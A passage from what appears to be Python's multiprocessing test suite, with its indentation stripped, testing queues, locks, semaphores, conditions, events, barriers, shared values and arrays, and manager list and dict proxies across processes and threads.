p = self.Process(target=sys.exit, args=(reason,))
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, reason)
#
#
#
def queue_empty(q):
if hasattr(q, 'empty'):
return q.empty()
else:
return q.qsize() == 0
def queue_full(q, maxsize):
if hasattr(q, 'full'):
return q.full()
else:
return q.qsize() == maxsize
class _TestQueue(BaseTestCase):
@classmethod
def _test_put(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
for i in range(6):
queue.get()
parent_can_continue.set()
def test_put(self):
MAXSIZE = 6
queue = self.Queue(maxsize=MAXSIZE)
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_put,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
queue.put(1)
queue.put(2, True)
queue.put(3, True, None)
queue.put(4, False)
queue.put(5, False, None)
queue.put_nowait(6)
# the values may be in buffer but not yet in pipe so sleep a bit
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
self.assertEqual(queue_full(queue, MAXSIZE), True)
put = TimingWrapper(queue.put)
put_nowait = TimingWrapper(queue.put_nowait)
self.assertRaises(pyqueue.Full, put, 7, False)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, False, None)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put_nowait, 7)
self.assertTimingAlmostEqual(put_nowait.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, TIMEOUT1)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Full, put, 7, False, TIMEOUT2)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT3)
child_can_start.set()
parent_can_continue.wait()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
proc.join()
close_queue(queue)
@classmethod
def _test_get(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
#queue.put(1)
queue.put(2)
queue.put(3)
queue.put(4)
queue.put(5)
parent_can_continue.set()
def test_get(self):
queue = self.Queue()
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_get,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
child_can_start.set()
parent_can_continue.wait()
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
# Hangs unexpectedly, remove for now
#self.assertEqual(queue.get(), 1)
self.assertEqual(queue.get(True, None), 2)
self.assertEqual(queue.get(True), 3)
self.assertEqual(queue.get(timeout=1), 4)
self.assertEqual(queue.get_nowait(), 5)
self.assertEqual(queue_empty(queue), True)
get = TimingWrapper(queue.get)
get_nowait = TimingWrapper(queue.get_nowait)
self.assertRaises(pyqueue.Empty, get, False)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, False, None)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get_nowait)
self.assertTimingAlmostEqual(get_nowait.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, True, TIMEOUT1)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Empty, get, False, TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT3)
proc.join()
close_queue(queue)
@classmethod
def _test_fork(cls, queue):
for i in range(10, 20):
queue.put(i)
# note that at this point the items may only be buffered, so the
# process cannot shutdown until the feeder thread has finished
# pushing items onto the pipe.
def test_fork(self):
# Old versions of Queue would fail to create a new feeder
# thread for a forked process if the original process had its
# own feeder thread. This test checks that this no longer
# happens.
queue = self.Queue()
# put items on queue so that main process starts a feeder thread
for i in range(10):
queue.put(i)
# wait to make sure thread starts before we fork a new process
time.sleep(DELTA)
# fork process
p = self.Process(target=self._test_fork, args=(queue,))
p.daemon = True
p.start()
# check that all expected items are in the queue
for i in range(20):
self.assertEqual(queue.get(), i)
self.assertRaises(pyqueue.Empty, queue.get, False)
p.join()
close_queue(queue)
def test_qsize(self):
q = self.Queue()
try:
self.assertEqual(q.qsize(), 0)
except NotImplementedError:
self.skipTest('qsize method not implemented')
q.put(1)
self.assertEqual(q.qsize(), 1)
q.put(5)
self.assertEqual(q.qsize(), 2)
q.get()
self.assertEqual(q.qsize(), 1)
q.get()
self.assertEqual(q.qsize(), 0)
close_queue(q)
@classmethod
def _test_task_done(cls, q):
for obj in iter(q.get, None):
time.sleep(DELTA)
q.task_done()
def test_task_done(self):
queue = self.JoinableQueue()
workers = [self.Process(target=self._test_task_done, args=(queue,))
for i in range(4)]
for p in workers:
p.daemon = True
p.start()
for i in range(10):
queue.put(i)
queue.join()
for p in workers:
queue.put(None)
for p in workers:
p.join()
close_queue(queue)
def test_no_import_lock_contention(self):
with test.support.temp_cwd():
module_name = 'imported_by_an_imported_module'
with open(module_name + '.py', 'w') as f:
f.write("""if 1:
import multiprocessing
q = multiprocessing.Queue()
q.put('knock knock')
q.get(timeout=3)
q.close()
del q
""")
with test.support.DirsOnSysPath(os.getcwd()):
try:
__import__(module_name)
except pyqueue.Empty:
self.fail("Probable regression on import lock contention;"
" see Issue #22853")
def test_timeout(self):
q = multiprocessing.Queue()
start = time.time()
self.assertRaises(pyqueue.Empty, q.get, True, 0.200)
delta = time.time() - start
# bpo-30317: Tolerate a delta of 100 ms because of the bad clock
# resolution on Windows (usually 15.6 ms). x86 Windows7 3.x once
# failed because the delta was only 135.8 ms.
self.assertGreaterEqual(delta, 0.100)
close_queue(q)
def test_queue_feeder_donot_stop_onexc(self):
# bpo-30414: verify feeder handles exceptions correctly
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
def __reduce__(self):
raise AttributeError
with test.support.captured_stderr():
q = self.Queue()
q.put(NotSerializable())
q.put(True)
# bpo-30595: use a timeout of 1 second for slow buildbots
self.assertTrue(q.get(timeout=1.0))
close_queue(q)
with test.support.captured_stderr():
# bpo-33078: verify that the queue size is correctly handled
# on errors.
q = self.Queue(maxsize=1)
q.put(NotSerializable())
q.put(True)
try:
self.assertEqual(q.qsize(), 1)
except NotImplementedError:
# qsize is not available on all platform as it
# relies on sem_getvalue
pass
# bpo-30595: use a timeout of 1 second for slow buildbots
self.assertTrue(q.get(timeout=1.0))
# Check that the size of the queue is correct
self.assertTrue(q.empty())
close_queue(q)
def test_queue_feeder_on_queue_feeder_error(self):
# bpo-30006: verify feeder handles exceptions using the
# _on_queue_feeder_error hook.
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
"""Mock unserializable object"""
def __init__(self):
self.reduce_was_called = False
self.on_queue_feeder_error_was_called = False
def __reduce__(self):
self.reduce_was_called = True
raise AttributeError
class SafeQueue(multiprocessing.queues.Queue):
"""Queue with overloaded _on_queue_feeder_error hook"""
@staticmethod
def _on_queue_feeder_error(e, obj):
if (isinstance(e, AttributeError) and
isinstance(obj, NotSerializable)):
obj.on_queue_feeder_error_was_called = True
not_serializable_obj = NotSerializable()
# The captured_stderr reduces the noise in the test report
with test.support.captured_stderr():
q = SafeQueue(ctx=multiprocessing.get_context())
q.put(not_serializable_obj)
# Verify that q is still functioning correctly
q.put(True)
self.assertTrue(q.get(timeout=1.0))
# Assert that the serialization and the hook have been called correctly
self.assertTrue(not_serializable_obj.reduce_was_called)
self.assertTrue(not_serializable_obj.on_queue_feeder_error_was_called)
#
#
#
class _TestLock(BaseTestCase):
def test_lock(self):
lock = self.Lock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(False), False)
self.assertEqual(lock.release(), None)
self.assertRaises((ValueError, threading.ThreadError), lock.release)
def test_rlock(self):
lock = self.RLock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertRaises((AssertionError, RuntimeError), lock.release)
def test_lock_context(self):
with self.Lock():
pass
class _TestSemaphore(BaseTestCase):
def _test_semaphore(self, sem):
self.assertReturnsIfImplemented(2, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.acquire(False), False)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(2, get_value, sem)
def test_semaphore(self):
sem = self.Semaphore(2)
self._test_semaphore(sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(3, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(4, get_value, sem)
def test_bounded_semaphore(self):
sem = self.BoundedSemaphore(2)
self._test_semaphore(sem)
# Currently fails on OS/X
#if HAVE_GETVALUE:
# self.assertRaises(ValueError, sem.release)
# self.assertReturnsIfImplemented(2, get_value, sem)
def test_timeout(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sem = self.Semaphore(0)
acquire = TimingWrapper(sem.acquire)
self.assertEqual(acquire(False), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, None), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, TIMEOUT1), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0)
self.assertEqual(acquire(True, TIMEOUT2), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT2)
self.assertEqual(acquire(timeout=TIMEOUT3), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT3)
class _TestCondition(BaseTestCase):
@classmethod
def f(cls, cond, sleeping, woken, timeout=None):
cond.acquire()
sleeping.release()
cond.wait(timeout)
woken.release()
cond.release()
def assertReachesEventually(self, func, value):
for i in range(10):
try:
if func() == value:
break
except NotImplementedError:
break
time.sleep(DELTA)
time.sleep(DELTA)
self.assertReturnsIfImplemented(value, func)
def check_invariant(self, cond):
# this is only supposed to succeed when there are no sleepers
if self.TYPE == 'processes':
try:
sleepers = (cond._sleeping_count.get_value() -
cond._woken_count.get_value())
self.assertEqual(sleepers, 0)
self.assertEqual(cond._wait_semaphore.get_value(), 0)
except NotImplementedError:
pass
def test_notify(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
p = threading.Thread(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
# wait for both children to start sleeping
sleeping.acquire()
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake up one process/thread
cond.acquire()
cond.notify()
cond.release()
# check one process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(1, get_value, woken)
# wake up another
cond.acquire()
cond.notify()
cond.release()
# check other has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(2, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
p.join()
def test_notify_all(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes which will timeout
for i in range(3):
p = self.Process(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them all to sleep
for i in range(6):
sleeping.acquire()
# check they have all timed out
for i in range(6):
woken.acquire()
self.assertReturnsIfImplemented(0, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
# start some more threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake them all up
cond.acquire()
cond.notify_all()
cond.release()
# check they have all woken
self.assertReachesEventually(lambda: get_value(woken), 6)
# check state is not mucked up
self.check_invariant(cond)
def test_notify_n(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake some of them up
cond.acquire()
cond.notify(n=2)
cond.release()
# check 2 have woken
self.assertReachesEventually(lambda: get_value(woken), 2)
# wake the rest of them
cond.acquire()
cond.notify(n=4)
cond.release()
self.assertReachesEventually(lambda: get_value(woken), 6)
# doesn't do anything more
cond.acquire()
cond.notify(n=3)
cond.release()
self.assertReturnsIfImplemented(6, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
def test_timeout(self):
cond = self.Condition()
wait = TimingWrapper(cond.wait)
cond.acquire()
res = wait(TIMEOUT1)
cond.release()
self.assertEqual(res, False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
@classmethod
def _test_waitfor_f(cls, cond, state):
with cond:
state.value = 0
cond.notify()
result = cond.wait_for(lambda : state.value==4)
if not result or state.value != 4:
sys.exit(1)
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', -1)
p = self.Process(target=self._test_waitfor_f, args=(cond, state))
p.daemon = True
p.start()
with cond:
result = cond.wait_for(lambda : state.value==0)
self.assertTrue(result)
self.assertEqual(state.value, 0)
for i in range(4):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertEqual(p.exitcode, 0)
@classmethod
def _test_waitfor_timeout_f(cls, cond, state, success, sem):
sem.release()
with cond:
expected = 0.1
dt = time.time()
result = cond.wait_for(lambda : state.value==4, timeout=expected)
dt = time.time() - dt
# borrow logic in assertTimeout() from test/lock_tests.py
if not result and expected * 0.6 < dt < expected * 10.0:
success.value = True
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor_timeout(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', 0)
success = self.Value('i', False)
sem = self.Semaphore(0)
p = self.Process(target=self._test_waitfor_timeout_f,
args=(cond, state, success, sem))
p.daemon = True
p.start()
self.assertTrue(sem.acquire(timeout=TIMEOUT))
# Only increment 3 times, so state == 4 is never reached.
for i in range(3):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertTrue(success.value)
@classmethod
def _test_wait_result(cls, c, pid):
with c:
c.notify()
time.sleep(1)
if pid is not None:
os.kill(pid, signal.SIGINT)
def test_wait_result(self):
if isinstance(self, ProcessesMixin) and sys.platform != 'win32':
pid = os.getpid()
else:
pid = None
c = self.Condition()
with c:
self.assertFalse(c.wait(0))
self.assertFalse(c.wait(0.1))
p = self.Process(target=self._test_wait_result, args=(c, pid))
p.start()
self.assertTrue(c.wait(60))
if pid is not None:
self.assertRaises(KeyboardInterrupt, c.wait, 60)
p.join()
class _TestEvent(BaseTestCase):
@classmethod
def _test_event(cls, event):
time.sleep(TIMEOUT2)
event.set()
def test_event(self):
event = self.Event()
wait = TimingWrapper(event.wait)
# Removed temporarily, due to API shear, this does not
# work with threading._Event objects. is_set == isSet
self.assertEqual(event.is_set(), False)
# Removed, threading.Event.wait() will return the value of the __flag
# instead of None. API Shear with the semaphore backed mp.Event
self.assertEqual(wait(0.0), False)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
event.set()
# See note above on the API differences
self.assertEqual(event.is_set(), True)
self.assertEqual(wait(), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
# self.assertEqual(event.is_set(), True)
event.clear()
#self.assertEqual(event.is_set(), False)
p = self.Process(target=self._test_event, args=(event,))
p.daemon = True
p.start()
self.assertEqual(wait(), True)
p.join()
#
# Tests for Barrier - adapted from tests in test/lock_tests.py
#
# Many of the tests for threading.Barrier use a list as an atomic
# counter: a value is appended to increment the counter, and the
# length of the list gives the value. We use the class DummyList
# for the same purpose.
class _DummyList(object):
def __init__(self):
wrapper = multiprocessing.heap.BufferWrapper(struct.calcsize('i'))
lock = multiprocessing.Lock()
self.__setstate__((wrapper, lock))
self._lengthbuf[0] = 0
def __setstate__(self, state):
(self._wrapper, self._lock) = state
self._lengthbuf = self._wrapper.create_memoryview().cast('i')
def __getstate__(self):
return (self._wrapper, self._lock)
def append(self, _):
with self._lock:
self._lengthbuf[0] += 1
def __len__(self):
with self._lock:
return self._lengthbuf[0]
def _wait():
# A crude wait/yield function not relying on synchronization primitives.
time.sleep(0.01)
class Bunch(object):
"""
A bunch of threads.
"""
def __init__(self, namespace, f, args, n, wait_before_exit=False):
"""
Construct a bunch of `n` threads running the same function `f`.
If `wait_before_exit` is True, the threads won't terminate until
do_finish() is called.
"""
self.f = f
self.args = args
self.n = n
self.started = namespace.DummyList()
self.finished = namespace.DummyList()
self._can_exit = namespace.Event()
if not wait_before_exit:
self._can_exit.set()
threads = []
for i in range(n):
p = namespace.Process(target=self.task)
p.daemon = True
p.start()
threads.append(p)
def finalize(threads):
for p in threads:
p.join()
self._finalizer = weakref.finalize(self, finalize, threads)
def task(self):
pid = os.getpid()
self.started.append(pid)
try:
self.f(*self.args)
finally:
self.finished.append(pid)
self._can_exit.wait(30)
assert self._can_exit.is_set()
def wait_for_started(self):
while len(self.started) < self.n:
_wait()
def wait_for_finished(self):
while len(self.finished) < self.n:
_wait()
def do_finish(self):
self._can_exit.set()
def close(self):
self._finalizer()
class AppendTrue(object):
def __init__(self, obj):
self.obj = obj
def __call__(self):
self.obj.append(True)
class _TestBarrier(BaseTestCase):
"""
Tests for Barrier objects.
"""
N = 5
defaultTimeout = 30.0 # XXX Slow Windows buildbots need generous timeout
def setUp(self):
self.barrier = self.Barrier(self.N, timeout=self.defaultTimeout)
def tearDown(self):
self.barrier.abort()
self.barrier = None
def DummyList(self):
if self.TYPE == 'threads':
return []
elif self.TYPE == 'manager':
return self.manager.list()
else:
return _DummyList()
def run_threads(self, f, args):
b = Bunch(self, f, args, self.N-1)
try:
f(*args)
b.wait_for_finished()
finally:
b.close()
@classmethod
def multipass(cls, barrier, results, n):
m = barrier.parties
assert m == cls.N
for i in range(n):
results[0].append(True)
assert len(results[1]) == i * m
barrier.wait()
results[1].append(True)
assert len(results[0]) == (i + 1) * m
barrier.wait()
try:
assert barrier.n_waiting == 0
except NotImplementedError:
pass
assert not barrier.broken
def test_barrier(self, passes=1):
"""
Test that a barrier is passed in lockstep
"""
results = [self.DummyList(), self.DummyList()]
self.run_threads(self.multipass, (self.barrier, results, passes))
def test_barrier_10(self):
"""
Test that a barrier works for 10 consecutive runs
"""
return self.test_barrier(10)
@classmethod
def _test_wait_return_f(cls, barrier, queue):
res = barrier.wait()
queue.put(res)
def test_wait_return(self):
"""
test the return value from barrier.wait
"""
queue = self.Queue()
self.run_threads(self._test_wait_return_f, (self.barrier, queue))
results = [queue.get() for i in range(self.N)]
self.assertEqual(results.count(0), 1)
close_queue(queue)
@classmethod
def _test_action_f(cls, barrier, results):
barrier.wait()
if len(results) != 1:
raise RuntimeError
def test_action(self):
"""
Test the 'action' callback
"""
results = self.DummyList()
barrier = self.Barrier(self.N, action=AppendTrue(results))
self.run_threads(self._test_action_f, (barrier, results))
self.assertEqual(len(results), 1)
@classmethod
def _test_abort_f(cls, barrier, results1, results2):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
def test_abort(self):
"""
Test that an abort will put the barrier in a broken state
"""
results1 = self.DummyList()
results2 = self.DummyList()
self.run_threads(self._test_abort_f,
(self.barrier, results1, results2))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertTrue(self.barrier.broken)
@classmethod
def _test_reset_f(cls, barrier, results1, results2, results3):
i = barrier.wait()
if i == cls.N//2:
# Wait until the other threads are all in the barrier.
while barrier.n_waiting < cls.N-1:
time.sleep(0.001)
barrier.reset()
else:
try:
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
# Now, pass the barrier again
barrier.wait()
results3.append(True)
def test_reset(self):
"""
Test that a 'reset' on a barrier frees the waiting threads
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
self.run_threads(self._test_reset_f,
(self.barrier, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_abort_and_reset_f(cls, barrier, barrier2,
results1, results2, results3):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
# Synchronize and reset the barrier. Must synchronize first so
# that everyone has left it when we reset, and after so that no
# one enters it before the reset.
if barrier2.wait() == cls.N//2:
barrier.reset()
barrier2.wait()
barrier.wait()
results3.append(True)
def test_abort_and_reset(self):
"""
Test that a barrier can be reset after being broken.
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
barrier2 = self.Barrier(self.N)
self.run_threads(self._test_abort_and_reset_f,
(self.barrier, barrier2, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_timeout_f(cls, barrier, results):
i = barrier.wait()
if i == cls.N//2:
# One thread is late!
time.sleep(1.0)
try:
barrier.wait(0.5)
except threading.BrokenBarrierError:
results.append(True)
def test_timeout(self):
"""
Test wait(timeout)
"""
results = self.DummyList()
self.run_threads(self._test_timeout_f, (self.barrier, results))
self.assertEqual(len(results), self.barrier.parties)
@classmethod
def _test_default_timeout_f(cls, barrier, results):
i = barrier.wait(cls.defaultTimeout)
if i == cls.N//2:
# One thread is later than the default timeout
time.sleep(1.0)
try:
barrier.wait()
except threading.BrokenBarrierError:
results.append(True)
def test_default_timeout(self):
"""
Test the barrier's default timeout
"""
barrier = self.Barrier(self.N, timeout=0.5)
results = self.DummyList()
self.run_threads(self._test_default_timeout_f, (barrier, results))
self.assertEqual(len(results), barrier.parties)
def test_single_thread(self):
b = self.Barrier(1)
b.wait()
b.wait()
@classmethod
def _test_thousand_f(cls, barrier, passes, conn, lock):
for i in range(passes):
barrier.wait()
with lock:
conn.send(i)
def test_thousand(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
passes = 1000
lock = self.Lock()
conn, child_conn = self.Pipe(False)
for j in range(self.N):
p = self.Process(target=self._test_thousand_f,
args=(self.barrier, passes, child_conn, lock))
p.start()
self.addCleanup(p.join)
for i in range(passes):
for j in range(self.N):
self.assertEqual(conn.recv(), i)
#
#
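# Tests for shared Value / RawValue and Array / RawArray objects (sharedctypes)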
#
class _TestValue(BaseTestCase):
ALLOWED_TYPES = ('processes',)
codes_values = [
('i', 4343, 24234),
('d', 3.625, -4.25),
('h', -232, 234),
('q', 2 ** 33, 2 ** 34),
('c', latin('x'), latin('y'))
]
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _test(cls, values):
for sv, cv in zip(values, cls.codes_values):
sv.value = cv[2]
def test_value(self, raw=False):
if raw:
values = [self.RawValue(code, value)
for code, value, _ in self.codes_values]
else:
values = [self.Value(code, value)
for code, value, _ in self.codes_values]
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[1])
proc = self.Process(target=self._test, args=(values,))
proc.daemon = True
proc.start()
proc.join()
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[2])
def test_rawvalue(self):
self.test_value(raw=True)
def test_getobj_getlock(self):
val1 = self.Value('i', 5)
lock1 = val1.get_lock()
obj1 = val1.get_obj()
val2 = self.Value('i', 5, lock=None)
lock2 = val2.get_lock()
obj2 = val2.get_obj()
lock = self.Lock()
val3 = self.Value('i', 5, lock=lock)
lock3 = val3.get_lock()
obj3 = val3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Value('i', 5, lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError, self.Value, 'i', 5, lock='navalue')
arr5 = self.RawValue('i', 5)
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
class _TestArray(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def f(cls, seq):
for i in range(1, len(seq)):
seq[i] += seq[i-1]
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array(self, raw=False):
seq = [680, 626, 934, 821, 150, 233, 548, 982, 714, 831]
if raw:
arr = self.RawArray('i', seq)
else:
arr = self.Array('i', seq)
self.assertEqual(len(arr), len(seq))
self.assertEqual(arr[3], seq[3])
self.assertEqual(list(arr[2:7]), list(seq[2:7]))
arr[4:8] = seq[4:8] = array.array('i', [1, 2, 3, 4])
self.assertEqual(list(arr[:]), seq)
self.f(seq)
p = self.Process(target=self.f, args=(arr,))
p.daemon = True
p.start()
p.join()
self.assertEqual(list(arr[:]), seq)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array_from_size(self):
size = 10
# Test for zeroing (see issue #11675).
# The repetition below strengthens the test by increasing the chances
# of previously allocated non-zero memory being used for the new array
# on the 2nd and 3rd loops.
for _ in range(3):
arr = self.Array('i', size)
self.assertEqual(len(arr), size)
self.assertEqual(list(arr), [0] * size)
arr[:] = range(10)
self.assertEqual(list(arr), list(range(10)))
del arr
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_rawarray(self):
self.test_array(raw=True)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_getobj_getlock_obj(self):
arr1 = self.Array('i', list(range(10)))
lock1 = arr1.get_lock()
obj1 = arr1.get_obj()
arr2 = self.Array('i', list(range(10)), lock=None)
lock2 = arr2.get_lock()
obj2 = arr2.get_obj()
lock = self.Lock()
arr3 = self.Array('i', list(range(10)), lock=lock)
lock3 = arr3.get_lock()
obj3 = arr3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Array('i', range(10), lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError,
self.Array, 'i', range(10), lock='notalock')
arr5 = self.RawArray('i', range(10))
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
#
#
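# Tests for the container proxies (list, dict, Namespace) provided by managers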
#
class _TestContainers(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_list(self):
a = self.list(list(range(10)))
self.assertEqual(a[:], list(range(10)))
b = self.list()
self.assertEqual(b[:], [])
b.extend(list(range(5)))
self.assertEqual(b[:], list(range(5)))
self.assertEqual(b[2], 2)
self.assertEqual(b[2:10], [2,3,4])
b *= 2
self.assertEqual(b[:], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4])
self.assertEqual(b + [5, 6], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 5, 6])
self.assertEqual(a[:], list(range(10)))
d = [a, b]
e = self.list(d)
self.assertEqual(
[element[:] for element in e],
[[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]]
)
f = self.list([a])
a.append('hello')
self.assertEqual(f[0][:], [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 'hello'])
def test_list_iter(self):
a = self.list(list(range(10)))
it = iter(a)
self.assertEqual(list(it), list(range(10)))
self.assertEqual(list(it), []) # exhausted
# list modified during iteration
it = iter(a)
a[0] = 100
self.assertEqual(next(it), 100)
def test_list_proxy_in_list(self):
a = self.list([self.list(range(3)) for _i in range(3)])
self.assertEqual([inner[:] for inner in a], [[0, 1, 2]] * 3)
a[0][-1] = 55
self.assertEqual(a[0][:], [0, 1, 55])
for i in range(1, 3):
self.assertEqual(a[i][:], [0, 1, 2])
self.assertEqual(a[1].pop(), 2)
self.assertEqual(len(a[1]), 2)
for i in range(0, 3, 2):
self.assertEqual(len(a[i]), 3)
del a
b = self.list()
b.append(b)
del b
def test_dict(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
self.assertEqual(d.copy(), dict((i, chr(i)) for i in indices))
self.assertEqual(sorted(d.keys()), indices)
self.assertEqual(sorted(d.values()), [chr(i) for i in indices])
self.assertEqual(sorted(d.items()), [(i, chr(i)) for i in indices])
def test_dict_iter(self):
d = self.dict()
